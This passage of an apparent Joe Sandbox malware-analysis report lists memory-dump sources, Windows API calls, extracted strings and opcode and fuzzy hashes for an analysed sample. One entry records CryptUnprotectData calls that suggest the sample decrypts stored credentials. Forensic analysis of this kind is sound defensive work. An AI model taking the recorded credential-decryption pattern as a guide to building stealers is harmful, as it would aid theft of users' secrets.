                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        • Opcode ID: 8e0686038187763e9a22e02637ab2cadb4b997093dfe0977a9d03c98cc0da13f
                                        • Instruction ID: ec82f41b6fbe5a494586c115715bf32df26ce57db9494e0fa4447d3c910797b2
                                        • Opcode Fuzzy Hash: 8e0686038187763e9a22e02637ab2cadb4b997093dfe0977a9d03c98cc0da13f
                                        • Instruction Fuzzy Hash: CC11E1B0A09218EBEB248F54DC45FA9BB78FB40720F1043D6F60AA32C0C7781A40CB55
                                        APIs
                                        • CoCreateInstance.COMBASE(004FE120,00000000,00000001,004FE110,00000000), ref: 004F39A8
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004F3A00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        • Opcode ID: 86da4b39d89ff361b24df28072b66f012ef961e02a13ede49cca1bbbfcc408a4
                                        • Instruction ID: f41f6f2e68bc34de2828acb90de0a2d3175597c646cef0fbf72ff781fdb68974
                                        • Opcode Fuzzy Hash: 86da4b39d89ff361b24df28072b66f012ef961e02a13ede49cca1bbbfcc408a4
                                        • Instruction Fuzzy Hash: FE41E770A00A1C9FDB24DF59CC95FABB7B5AB48702F4081C9E608E7290D7B56E85CF54
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004EA2D4
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 004EA2F3
                                        • LocalFree.KERNEL32(?), ref: 004EA323
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                        • String ID:
                                        • API String ID: 2068576380-0
                                        • Opcode ID: 8dc24d19efc8eeb4ee48031f25422cf443cce6c992cc1374aaa2fc949fd896cd
                                        • Instruction ID: 2d10a6b17dd4b4081405b82668f43b46f09698038fa47e22405855a464913db8
                                        • Opcode Fuzzy Hash: 8dc24d19efc8eeb4ee48031f25422cf443cce6c992cc1374aaa2fc949fd896cd
                                        • Instruction Fuzzy Hash: 9011E8B8A00209DFCB04DF94D888EAEB7B5FB88300F108559ED15A7390D734AE50CB61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 5,w=${7W~
                                        • API String ID: 0-1447155224
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ?$__ZN
                                        • API String ID: 0-1427190319
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: xn--
                                        • API String ID: 0-2826155999
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: UNC\
                                        • API String ID: 0-505053535
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: t9;I
                                        • API String ID: 0-3708887236
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: I!k~
                                        • API String ID: 0-3479374379
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction ID: 0cda85abb7452127cd12cb2ebe9413b4cc21f92f89fbe3e1885840522b59de3c
                                        • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                        • Instruction Fuzzy Hash: 1342A0706047618FD725CF19E094665FFE2BF9B310F288A6EC4868B7D2D635E885CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction ID: a79bda8530ddaebb018d95cf968b740a6adc9085d53f697576ea4872f20c512e
                                        • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                        • Instruction Fuzzy Hash: B302E471E002168FDB11CF28C8916AFBBA2BFDA341F15872BEC15B7651D770AD858790
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction ID: 390d2d2436a640acdd370948380e659a16dd884c9c49fc40ec6fc71e5a83ccfd
                                        • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                        • Instruction Fuzzy Hash: 0002F1B1A083058FDB15DF29C881369BBE1BFA5310F148B2DEC999B352D7B1EC858B41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction ID: d10fb3d3c5ca736dddcc8b91b45cebcb53ba29f3c16a7002dc2dd8425a8ae5cd
                                        • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                        • Instruction Fuzzy Hash: 4EF16AB25086A14BC71D9A1494B08BD7FD2AFAA201F0E86ADFDD60F393D924DA01DB51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction ID: f9e329ba1176929c19680b94d9f916acf49fd2f48af0c3d168692d6d8a189355
                                        • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                        • Instruction Fuzzy Hash: 51D17473F10A254BFB08CA99DC923ADB6E2FBD8350F19413ED916E7381D6B89D418790
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                        • Instruction ID: f990615dbb9d751c13d08b620f473431ed23e9e4c74e243e81e5f4e97547352a
                                        • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                        • Instruction Fuzzy Hash: 61D1E372E002198BDF24CF98D8A47EEBBB1BF89311F14922AED15A72D1D7345D4A8B50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction ID: 4bfafa1de4ab4b8104aeafd7915a723bc023a67971b96608c6297f812b3df37a
                                        • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                        • Instruction Fuzzy Hash: 0D026974E006598FCF26CFA8C4905EDBBB6FF8D310F548159E899AB355C730AA91CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction ID: 0997ea8398502aed5c1b4deaf68c3273bc3ad411b68f09f124500f9a8a5efc5b
                                        • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                        • Instruction Fuzzy Hash: 51020175E00619CFCB15CF98C4809ADBBB6FF88350F258569E80ABB355D731AA91CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
